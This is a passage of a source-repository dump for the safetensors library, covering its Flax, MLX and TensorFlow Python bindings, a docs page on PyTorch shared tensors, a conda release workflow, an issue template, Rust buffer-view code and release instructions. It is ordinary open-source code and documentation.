| Returns: 59 | `None` 60 | 61 | Example: 62 | 63 | ```python 64 | from safetensors.flax import save_file 65 | from jax import numpy as jnp 66 | 67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} 68 | save_file(tensors, "model.safetensors") 69 | ``` 70 | """ 71 | np_tensors = _jnp2np(tensors) 72 | return numpy.save_file(np_tensors, filename, metadata=metadata) 73 | 74 | 75 | def load(data: bytes) -> Dict[str, Array]: 76 | """ 77 | Loads a safetensors file into flax format from pure bytes. 78 | 79 | Args: 80 | data (`bytes`): 81 | The content of a safetensors file 82 | 83 | Returns: 84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu 85 | 86 | Example: 87 | 88 | ```python 89 | from safetensors.flax import load 90 | 91 | file_path = "./my_folder/bert.safetensors" 92 | with open(file_path, "rb") as f: 93 | data = f.read() 94 | 95 | loaded = load(data) 96 | ``` 97 | """ 98 | flat = numpy.load(data) 99 | return _np2jnp(flat) 100 | 101 | 102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]: 103 | """ 104 | Loads a safetensors file into flax format. 105 | 106 | Args: 107 | filename (`str`, or `os.PathLike`)): 108 | The name of the file which contains the tensors 109 | 110 | Returns: 111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` 112 | 113 | Example: 114 | 115 | ```python 116 | from safetensors.flax import load_file 117 | 118 | file_path = "./my_folder/bert.safetensors" 119 | loaded = load_file(file_path) 120 | ``` 121 | """ 122 | result = {} 123 | with safe_open(filename, framework="flax") as f: 124 | for k in f.offset_keys(): 125 | result[k] = f.get_tensor(k) 126 | return result 127 | 128 | 129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]: 130 | for k, v in numpy_dict.items(): 131 | numpy_dict[k] = jnp.array(v) 132 | return numpy_dict 133 | 134 | 135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]: 136 | for k, v in jnp_dict.items(): 137 | jnp_dict[k] = np.asarray(v) 138 | return jnp_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import mlx.core as mx 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save( 11 | tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None 12 | ) -> bytes: 13 | """ 14 | Saves a dictionary of tensors into raw bytes in safetensors format. 15 | 16 | Args: 17 | tensors (`Dict[str, mx.array]`): 18 | The incoming tensors. Tensors need to be contiguous and dense. 19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 20 | Optional text only metadata you might want to save in your header. 21 | For instance it can be useful to specify more about the underlying 22 | tensors. This is purely informative and does not affect tensor loading. 23 | 24 | Returns: 25 | `bytes`: The raw bytes representing the format 26 | 27 | Example: 28 | 29 | ```python 30 | from safetensors.mlx import save 31 | import mlx.core as mx 32 | 33 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 34 | byte_data = save(tensors) 35 | ``` 36 | """ 37 | np_tensors = _mx2np(tensors) 38 | return numpy.save(np_tensors, metadata=metadata) 39 | 40 | 41 | def save_file( 42 | tensors: Dict[str, mx.array], 43 | filename: Union[str, os.PathLike], 44 | metadata: Optional[Dict[str, str]] = None, 45 | ) -> None: 46 | """ 47 | Saves a dictionary of tensors into raw bytes in safetensors format. 48 | 49 | Args: 50 | tensors (`Dict[str, mx.array]`): 51 | The incoming tensors. Tensors need to be contiguous and dense. 52 | filename (`str`, or `os.PathLike`)): 53 | The filename we're saving into. 54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 55 | Optional text only metadata you might want to save in your header. 56 | For instance it can be useful to specify more about the underlying 57 | tensors. This is purely informative and does not affect tensor loading. 58 | 59 | Returns: 60 | `None` 61 | 62 | Example: 63 | 64 | ```python 65 | from safetensors.mlx import save_file 66 | import mlx.core as mx 67 | 68 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 69 | save_file(tensors, "model.safetensors") 70 | ``` 71 | """ 72 | np_tensors = _mx2np(tensors) 73 | return numpy.save_file(np_tensors, filename, metadata=metadata) 74 | 75 | 76 | def load(data: bytes) -> Dict[str, mx.array]: 77 | """ 78 | Loads a safetensors file into MLX format from pure bytes. 79 | 80 | Args: 81 | data (`bytes`): 82 | The content of a safetensors file 83 | 84 | Returns: 85 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` 86 | 87 | Example: 88 | 89 | ```python 90 | from safetensors.mlx import load 91 | 92 | file_path = "./my_folder/bert.safetensors" 93 | with open(file_path, "rb") as f: 94 | data = f.read() 95 | 96 | loaded = load(data) 97 | ``` 98 | """ 99 | flat = numpy.load(data) 100 | return _np2mx(flat) 101 | 102 | 103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]: 104 | """ 105 | Loads a safetensors file into MLX format. 106 | 107 | Args: 108 | filename (`str`, or `os.PathLike`)): 109 | The name of the file which contains the tensors 110 | 111 | Returns: 112 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` 113 | 114 | Example: 115 | 116 | ```python 117 | from safetensors.flax import load_file 118 | 119 | file_path = "./my_folder/bert.safetensors" 120 | loaded = load_file(file_path) 121 | ``` 122 | """ 123 | result = {} 124 | with safe_open(filename, framework="mlx") as f: 125 | for k in f.offset_keys(): 126 | result[k] = f.get_tensor(k) 127 | return result 128 | 129 | 130 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]: 131 | for k, v in numpy_dict.items(): 132 | numpy_dict[k] = mx.array(v) 133 | return numpy_dict 134 | 135 | 136 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]: 137 | new_dict = {} 138 | for k, v in mx_dict.items(): 139 | new_dict[k] = np.asarray(v) 140 | return new_dict 141 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/tensorflow.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save( 11 | tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None 12 | ) -> bytes: 13 | """ 14 | Saves a dictionary of tensors into raw bytes in safetensors format. 15 | 16 | Args: 17 | tensors (`Dict[str, tf.Tensor]`): 18 | The incoming tensors. Tensors need to be contiguous and dense. 19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 20 | Optional text only metadata you might want to save in your header. 21 | For instance it can be useful to specify more about the underlying 22 | tensors. This is purely informative and does not affect tensor loading. 23 | 24 | Returns: 25 | `bytes`: The raw bytes representing the format 26 | 27 | Example: 28 | 29 | ```python 30 | from safetensors.tensorflow import save 31 | import tensorflow as tf 32 | 33 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 34 | byte_data = save(tensors) 35 | ``` 36 | """ 37 | np_tensors = _tf2np(tensors) 38 | return numpy.save(np_tensors, metadata=metadata) 39 | 40 | 41 | def save_file( 42 | tensors: Dict[str, tf.Tensor], 43 | filename: Union[str, os.PathLike], 44 | metadata: Optional[Dict[str, str]] = None, 45 | ) -> None: 46 | """ 47 | Saves a dictionary of tensors into raw bytes in safetensors format. 48 | 49 | Args: 50 | tensors (`Dict[str, tf.Tensor]`): 51 | The incoming tensors. Tensors need to be contiguous and dense. 52 | filename (`str`, or `os.PathLike`)): 53 | The filename we're saving into. 54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 55 | Optional text only metadata you might want to save in your header. 56 | For instance it can be useful to specify more about the underlying 57 | tensors. This is purely informative and does not affect tensor loading. 58 | 59 | Returns: 60 | `None` 61 | 62 | Example: 63 | 64 | ```python 65 | from safetensors.tensorflow import save_file 66 | import tensorflow as tf 67 | 68 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 69 | save_file(tensors, "model.safetensors") 70 | ``` 71 | """ 72 | np_tensors = _tf2np(tensors) 73 | return numpy.save_file(np_tensors, filename, metadata=metadata) 74 | 75 | 76 | def load(data: bytes) -> Dict[str, tf.Tensor]: 77 | """ 78 | Loads a safetensors file into tensorflow format from pure bytes. 79 | 80 | Args: 81 | data (`bytes`): 82 | The content of a safetensors file 83 | 84 | Returns: 85 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu 86 | 87 | Example: 88 | 89 | ```python 90 | from safetensors.tensorflow import load 91 | 92 | file_path = "./my_folder/bert.safetensors" 93 | with open(file_path, "rb") as f: 94 | data = f.read() 95 | 96 | loaded = load(data) 97 | ``` 98 | """ 99 | flat = numpy.load(data) 100 | return _np2tf(flat) 101 | 102 | 103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]: 104 | """ 105 | Loads a safetensors file into tensorflow format. 106 | 107 | Args: 108 | filename (`str`, or `os.PathLike`)): 109 | The name of the file which contains the tensors 110 | 111 | Returns: 112 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` 113 | 114 | Example: 115 | 116 | ```python 117 | from safetensors.tensorflow import load_file 118 | 119 | file_path = "./my_folder/bert.safetensors" 120 | loaded = load_file(file_path) 121 | ``` 122 | """ 123 | result = {} 124 | with safe_open(filename, framework="tf") as f: 125 | for k in f.offset_keys(): 126 | result[k] = f.get_tensor(k) 127 | return result 128 | 129 | 130 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]: 131 | for k, v in numpy_dict.items(): 132 | numpy_dict[k] = tf.convert_to_tensor(v) 133 | return numpy_dict 134 | 135 | 136 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]: 137 | for k, v in tf_dict.items(): 138 | tf_dict[k] = v.numpy() 139 | return tf_dict 140 | -------------------------------------------------------------------------------- /docs/source/torch_shared_tensors.mdx: -------------------------------------------------------------------------------- 1 | # Torch shared tensors 2 | 3 | 4 | ## TL;DR 5 | 6 | Using specific functions, which should work in most cases for you. 7 | This is not without side effects. 8 | 9 | ```python 10 | from safetensors.torch import load_model, save_model 11 | 12 | save_model(model, "model.safetensors") 13 | # Instead of save_file(model.state_dict(), "model.safetensors") 14 | 15 | load_model(model, "model.safetensors") 16 | # Instead of model.load_state_dict(load_file("model.safetensors")) 17 | ``` 18 | 19 | ## What are shared tensors ? 20 | 21 | Pytorch uses shared tensors for some computation. 22 | This is extremely interesting to reduce memory usage in general. 23 | 24 | One very classic use case is in transformers the `embeddings` are shared with 25 | `lm_head`. By using the same matrix, the model uses less parameters, and gradients 26 | flow much better to the `embeddings` (which is the start of the model, so they don't 27 | flow easily there, whereas `lm_head` is at the tail of the model, so gradients are 28 | extremely good over there, since they are the same tensors, they both benefit) 29 | 30 | 31 | ```python 32 | from torch import nn 33 | 34 | class Model(nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = nn.Linear(100, 100) 38 | self.b = self.a 39 | 40 | def forward(self, x): 41 | return self.b(self.a(x)) 42 | 43 | 44 | model = Model() 45 | print(model.state_dict()) 46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias']) 47 | torch.save(model.state_dict(), "model.bin") 48 | # This file is now 41k instead of ~80k, because A and B are the same weight hence only 1 is saved on disk with both `a` and `b` pointing to the same buffer 49 | ``` 50 | 51 | ## Why are shared tensors not saved in `safetensors` ? 52 | 53 | Multiple reasons for that: 54 | 55 | - *Not all frameworks support them* for instance `tensorflow` does not. 56 | So if someone saves shared tensors in torch, there is no way to 57 | load them in a similar fashion so we could not keep the same `Dict[str, Tensor]` 58 | API. 59 | - *It makes lazy loading very quickly.* 60 | Lazy loading is the ability to load only some tensors, or part of tensors for 61 | a given file. This is trivial to do without sharing tensors but with tensor sharing 62 | 63 | ```python 64 | with safe_open("model.safetensors", framework="pt") as f: 65 | a = f.get_tensor("a") 66 | b = f.get_tensor("b") 67 | ``` 68 | 69 | Now it's impossible with this given code to "reshare" buffers after the fact. 70 | Once we give the `a` tensor we have no way to give back the same memory when 71 | you ask for `b`. (In this particular example we could keep track of given buffers 72 | but this is not the case in general, since you could do arbitrary work with `a` 73 | like sending it to another device before asking for `b`) 74 | - *It can lead to much larger file than necessary*. 75 | If you are saving a shared tensor which is only a fraction of a larger tensor, 76 | then saving it with pytorch leads to saving the entire buffer instead of saving 77 | just what is needed. 78 | 79 | ```python 80 | a = torch.zeros((100, 100)) 81 | b = a[:1, :] 82 | torch.save({"b": b}, "model.bin") 83 | # File is 41k instead of the expected 400 bytes 84 | # In practice it could happen that you save several 10GB instead of 1GB. 85 | ``` 86 | 87 | Now with all those reasons being mentioned, nothing is set in stone in there. 88 | Shared tensors do not cause unsafety, or denial of service potential, so this 89 | decision could be revisited if current workarounds are not satisfactory. 90 | 91 | ## How does it work ? 92 | 93 | The design is rather simple. 94 | We're going to look for all shared tensors, then looking for all tensors 95 | covering the entire buffer (there can be multiple such tensors). 96 | That gives us multiple names which can be saved, we simply choose the first one 97 | 98 | During `load_model`, we are loading a bit like `load_state_dict` does, except 99 | we're looking into the model itself, to check for shared buffers, and ignoring 100 | the "missed keys" which were actually covered by virtue of buffer sharing (they 101 | were properly loaded since there was a buffer that loaded under the hood). 102 | Every other error is raised as-is 103 | 104 | **Caveat**: This means we're dropping some keys within the file. meaning if you're 105 | checking for the keys saved on disk, you will see some "missing tensors" or if you're 106 | using `load_state_dict`. Unless we start supporting shared tensors directly in 107 | the format there's no real way around it. 108 | -------------------------------------------------------------------------------- /.github/workflows/python-release-conda.yml: -------------------------------------------------------------------------------- 1 | name: Python Release - Conda 2 | 3 | on: 4 | push: 5 | tags: 6 | - v* 7 | 8 | env: 9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }} 10 | 11 | jobs: 12 | build_and_package: 13 | runs-on: ${{ matrix.os }} 14 | strategy: 15 | matrix: 16 | os: [windows-latest, macos-latest] 17 | python: ["3.9", "3.10", "3.11", "3.12", "3.13"] 18 | 19 | steps: 20 | - name: Checkout repository 21 | uses: actions/checkout@v6 22 | 23 | - name: Install miniconda 24 | uses: conda-incubator/setup-miniconda@v3 25 | with: 26 | auto-update-conda: true 27 | miniconda-version: "latest" 28 | python-version: ${{ matrix.python }} 29 | channels: conda-forge 30 | 31 | - name: Conda info 32 | shell: bash -l {0} 33 | run: conda info 34 | 35 | - name: Install Rust 36 | uses: dtolnay/rust-toolchain@stable 37 | 38 | - name: Setup conda env 39 | shell: bash -l {0} 40 | run: | 41 | conda install setuptools-rust 42 | conda install -c defaults anaconda-client conda-build 43 | 44 | - name: Extract version 45 | shell: bash -l {0} 46 | working-directory: ./bindings/python 47 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 48 | 49 | - name: Build conda packages 50 | shell: bash -l {0} 51 | run: | 52 | conda info 53 | conda list 54 | conda-build .github/conda --python=${{ matrix.python }} 55 | 56 | - name: Upload to Anaconda 57 | shell: bash -l {0} 58 | run: | 59 | anaconda upload `conda-build .github/conda --output` --force 60 | 61 | build_and_package_linux: 62 | runs-on: ubuntu-latest 63 | container: quay.io/pypa/manylinux_2_28_x86_64 64 | 65 | strategy: 66 | fail-fast: false 67 | matrix: 68 | python: [39, 310, 311, 312, 313] 69 | include: 70 | - python: 39 71 | checksum: d8d13344b46a057659397b9ca1a948d184bf59f04efa8864df8c01f7557e2baa 72 | - python: 310 73 | checksum: 04a8b03d8b0ec062d923e592201a6fd88b7247c309ef8848afb25c424c40ac39 74 | - python: 311 75 | checksum: 238abad23f8d4d8ba89dd05df0b0079e278909a36e06955f12bbef4aa94e6131 76 | - python: 312 77 | checksum: a0def9c732d94b156529ef7db8edd6e1862cee784a27a4961870dca86e89fba4 78 | - python: 313 79 | checksum: 6022714da22986097bbefa13dab3d957257fef04e1c37d1ebd3645b5b99bc9d4 80 | 81 | steps: 82 | - name: Checkout repository 83 | uses: actions/checkout@v6 84 | 85 | - name: Install miniconda 86 | run: | 87 | yum install -y wget openssl-devel 88 | export FILENAME=Miniconda3-py${{ matrix.python }}_25.9.1-1-Linux-x86_64.sh 89 | wget https://repo.anaconda.com/miniconda/$FILENAME 90 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}' 91 | bash $FILENAME -b -p $HOME/miniconda 92 | source $HOME/miniconda/bin/activate 93 | 94 | - name: Show glibc information 95 | shell: bash -l {0} 96 | run: ldd --version 97 | 98 | - name: Conda info 99 | shell: bash -l {0} 100 | run: | 101 | source $HOME/miniconda/bin/activate 102 | conda info 103 | 104 | - name: Install Rust 105 | uses: dtolnay/rust-toolchain@stable 106 | 107 | - name: Setup conda env 108 | shell: bash -l {0} 109 | run: | 110 | source $HOME/miniconda/bin/activate 111 | conda install setuptools-rust 112 | conda install -c defaults anaconda-client conda-build 113 | 114 | - name: Extract version 115 | shell: bash -l {0} 116 | working-directory: ./bindings/python 117 | run: | 118 | source $HOME/miniconda/bin/activate 119 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 120 | 121 | - name: Build conda packages 122 | shell: bash -l {0} 123 | run: | 124 | source $HOME/miniconda/bin/activate 125 | conda info 126 | conda list 127 | conda-build .github/conda --python=${{ matrix.python }} 128 | 129 | - name: Upload to Anaconda 130 | shell: bash -l {0} 131 | run: | 132 | source $HOME/miniconda/bin/activate 133 | anaconda upload `conda-build .github/conda --output` --force 134 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug-report.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F41B Bug Report" 2 | description: Submit a bug report to help us improve safetensors 3 | body: 4 | - type: textarea 5 | id: system-info 6 | attributes: 7 | label: System Info 8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below. 9 | placeholder: safetensors version, platform, python version, ... 10 | validations: 11 | required: true 12 | 13 | # - type: textarea 14 | # id: who-can-help 15 | # attributes: 16 | # label: Who can help? 17 | # description: | 18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @ 19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**. 20 | # 21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and 22 | # a core maintainer will ping the right person. 23 | # 24 | # Please tag fewer than 3 people. 25 | # 26 | # Models: 27 | 28 | # - text models: @ArthurZucker and @younesbelkada 29 | # - vision models: @amyeroberts 30 | # - speech models: @sanchit-gandhi 31 | # - graph models: @clefourrier 32 | # 33 | # Library: 34 | # 35 | # - flax: @sanchit-gandhi 36 | # - generate: @gante 37 | # - pipelines: @Narsil 38 | # - tensorflow: @gante and @Rocketknight1 39 | # - tokenizers: @ArthurZucker 40 | # - trainer: @sgugger 41 | # 42 | # Integrations: 43 | # 44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100 45 | # - ray/raytune: @richardliaw, @amogkam 46 | # - Big Model Inference: @sgugger @muellerzr 47 | # 48 | # Documentation: @sgugger, @stevhliu and @MKhalusova 49 | # 50 | # Model hub: 51 | 52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator. 53 | # 54 | # HF projects: 55 | # 56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate) 57 | # - datasets: [different repo](https://github.com/huggingface/datasets) 58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers) 59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers) 60 | # 61 | # Maintained examples (not research project or legacy): 62 | # 63 | # - Flax: @sanchit-gandhi 64 | # - PyTorch: @sgugger 65 | # - TensorFlow: @Rocketknight1 66 | 67 | # Research projects are not maintained and should be taken as is. 68 | 69 | # placeholder: "@Username ..." 70 | 71 | - type: checkboxes 72 | id: information-scripts-examples 73 | attributes: 74 | label: Information 75 | description: 'The problem arises when using:' 76 | options: 77 | - label: "The official example scripts" 78 | - label: "My own modified scripts" 79 | 80 | - type: textarea 81 | id: reproduction 82 | validations: 83 | required: true 84 | attributes: 85 | label: Reproduction 86 | description: | 87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet. 88 | If you have code snippets, error messages, stack traces please provide them here as well. 89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting 90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code. 91 | 92 | placeholder: | 93 | Steps to reproduce the behavior: 94 | 95 | 1. 96 | 2. 97 | 3. 98 | 99 | 100 | - type: textarea 101 | id: expected-behavior 102 | validations: 103 | required: true 104 | attributes: 105 | label: Expected behavior 106 | description: "A clear and concise description of what you would expect to happen." 107 | -------------------------------------------------------------------------------- /bindings/python/src/view.rs: -------------------------------------------------------------------------------- 1 | use crate::SafetensorError; 2 | #[cfg(feature = "py311")] 3 | use pyo3::buffer::PyBuffer; 4 | use pyo3::prelude::*; 5 | #[cfg(feature = "py38")] 6 | use pyo3::types::PyBytes; 7 | use pyo3::types::PyDict; 8 | use pyo3::Bound as PyBound; 9 | use safetensors::{Dtype, View}; 10 | use std::borrow::Cow; 11 | use std::collections::HashMap; 12 | 13 | #[cfg(feature = "py38")] 14 | pub struct PyView<'a> { 15 | shape: Vec, 16 | dtype: Dtype, 17 | data: PyBound<'a, PyBytes>, 18 | data_len: usize, 19 | } 20 | 21 | #[cfg(feature = "py311")] 22 | pub struct PyView<'a> { 23 | shape: Vec, 24 | dtype: Dtype, 25 | data: PyBuffer, 26 | data_len: usize, 27 | // Kept to keep the GIL open while we hold the buffer 28 | _py: Python<'a>, 29 | } 30 | 31 | impl View for &PyView<'_> { 32 | #[cfg(feature = "py38")] 33 | fn data(&self) -> std::borrow::Cow<[u8]> { 34 | Cow::Borrowed(self.data.as_bytes()) 35 | } 36 | #[cfg(feature = "py311")] 37 | fn data(&self) -> std::borrow::Cow<[u8]> { 38 | // We already checked this in the Python side. 39 | assert!(self.data.is_c_contiguous()); 40 | // XXX: Ideally we could have at least readonly tensors 41 | // assert!(self.data.readonly()); 42 | // SAFETY: 43 | // This is actually totally unsafe, PyBuffer is not immutable and could be changed from 44 | // under us. 45 | // This is made safer because we're still hanging to the GIL while treating 46 | // this structure 47 | Cow::Borrowed(unsafe { 48 | std::slice::from_raw_parts(self.data.buf_ptr() as *const u8, self.data.item_count()) 49 | }) 50 | } 51 | fn shape(&self) -> &[usize] { 52 | &self.shape 53 | } 54 | fn dtype(&self) -> Dtype { 55 | self.dtype 56 | } 57 | fn data_len(&self) -> usize { 58 | self.data_len 59 | } 60 | } 61 | 62 | pub fn prepare(tensor_dict: HashMap>) -> PyResult> { 63 | let mut tensors = HashMap::with_capacity(tensor_dict.len()); 64 | for (tensor_name, tensor_desc) in &tensor_dict { 65 | let mut shape: Vec = tensor_desc 66 | .get_item("shape")? 67 | .ok_or_else(|| SafetensorError::new_err(format!("Missing `shape` in {tensor_desc:?}")))? 68 | .extract()?; 69 | let pydata: PyBound = tensor_desc.get_item("data")?.ok_or_else(|| { 70 | SafetensorError::new_err(format!("Missing `data` in {tensor_desc:?}")) 71 | })?; 72 | 73 | let pydtype = tensor_desc.get_item("dtype")?.ok_or_else(|| { 74 | SafetensorError::new_err(format!("Missing `dtype` in {tensor_desc:?}")) 75 | })?; 76 | let dtype: String = pydtype.extract()?; 77 | let dtype = match dtype.as_ref() { 78 | "bool" => Dtype::BOOL, 79 | "int8" => Dtype::I8, 80 | "uint8" => Dtype::U8, 81 | "int16" => Dtype::I16, 82 | "uint16" => Dtype::U16, 83 | "int32" => Dtype::I32, 84 | "uint32" => Dtype::U32, 85 | "int64" => Dtype::I64, 86 | "uint64" => Dtype::U64, 87 | "float16" => Dtype::F16, 88 | "float32" => Dtype::F32, 89 | "float64" => Dtype::F64, 90 | "bfloat16" => Dtype::BF16, 91 | "float8_e4m3fn" => Dtype::F8_E4M3, 92 | "float8_e5m2" => Dtype::F8_E5M2, 93 | "float8_e8m0fnu" => Dtype::E8M0, 94 | "float4_e2m1fn_x2" => Dtype::F4, 95 | "complex64" => Dtype::C64, 96 | dtype_str => { 97 | return Err(SafetensorError::new_err(format!( 98 | "dtype {dtype_str} is not covered", 99 | ))); 100 | } 101 | }; 102 | if dtype == Dtype::F4 { 103 | let n = shape.len(); 104 | shape[n - 1] *= 2; 105 | } 106 | 107 | #[cfg(feature = "py311")] 108 | let tensor = { 109 | let data: PyBuffer = pydata.extract()?; 110 | if !data.is_c_contiguous() { 111 | return Err(SafetensorError::new_err("Python buffer is not contiguous")); 112 | } 113 | // XXX Ideally this would be true. 114 | // if !data.readonly() { 115 | // return Err(SafetensorError::new_err("Python buffer is not readonly")); 116 | // } 117 | let data_len = data.item_count(); 118 | let py = pydata.py(); 119 | PyView { 120 | shape, 121 | dtype, 122 | data, 123 | data_len, 124 | _py: py, 125 | } 126 | }; 127 | 128 | #[cfg(feature = "py38")] 129 | let tensor = { 130 | let data: &[u8] = pydata.extract()?; 131 | let data_len = data.len(); 132 | let data: PyBound = pydata.extract()?; 133 | PyView { 134 | shape, 135 | dtype, 136 | data, 137 | data_len, 138 | } 139 | }; 140 | 141 | tensors.insert(tensor_name.to_string(), tensor); 142 | } 143 | Ok(tensors) 144 | } 145 | -------------------------------------------------------------------------------- /RELEASE.md: -------------------------------------------------------------------------------- 1 | ## How to release 2 | 3 | # Before the release 4 | 5 | Simple checklist on how to make releases for `safetensors`. 6 | 7 | - Freeze `main` branch. 8 | - Run all tests (Check CI has properly run) 9 | - If any significant work, check benchmarks: 10 | - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time) 11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need 12 | to make sure we don't break it, testing is one way to make sure nothing unforeseen 13 | has been done.) 14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`) 15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers` 16 | test suite. 17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708). 18 | This will create new docker images ready to run the tests suites with `safetensors` from the main branch. 19 | - Wait for actions to finish 20 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712) 21 | This will run the actual full test suite. 22 | - Check the results. 23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154) 24 | For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting 25 | current users 26 | - Then start a new PR containing all desired code changes from the following steps. 27 | - You will `Create release` after the code modifications are on `master`. 28 | 29 | # Rust 30 | 31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's 32 | very common to release for all versions at once for new features. 33 | - Edit `Cargo.toml` to reflect new version 34 | - Edit `CHANGELOG.md`: 35 | - Add relevant PRs that were added (python PRs do not belong for instance). 36 | - Add links at the end of the files. 37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 38 | - Create new Release: 39 | - Mark it as pre-release 40 | - Use new version name with a new tag (create on publish) `vX.X.X`. 41 | - Copy paste the new part of the `CHANGELOG.md` 42 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 43 | the new version on `crates.io`, there's no going back after this 44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 46 | 47 | 48 | # Python 49 | 50 | - Edit `bindings/python/setup.py` to reflect new version. 51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version. 52 | - Edit `CHANGELOG.md`: 53 | - Add relevant PRs that were added (node PRs do not belong for instance). 54 | - Add links at the end of the files. 55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 56 | - Create new Release: 57 | - Mark it as pre-release 58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`. 59 | - Copy paste the new part of the `CHANGELOG.md` 60 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 61 | the new version on `pypi`, there's no going back after this 62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 64 | - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes 65 | 66 | # Node 67 | 68 | - Edit `bindings/node/package.json` to reflect new version. 69 | - Edit `CHANGELOG.md`: 70 | - Add relevant PRs that were added (python PRs do not belong for instance). 71 | - Add links at the end of the files. 72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 73 | - Create new Release: 74 | - Mark it as pre-release 75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`. 76 | - Copy paste the new part of the `CHANGELOG.md` 77 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 78 | the new version on `npm`, there's no going back after this 79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 81 | 82 | 83 | # Testing the CI/CD for release 84 | 85 | 86 | If you want to make modifications to the CI/CD of the release GH actions, you need 87 | to : 88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`. 89 | - Change the trigger mechanism so it can trigger every time you push to your branch. 90 | - Keep pushing your changes until the 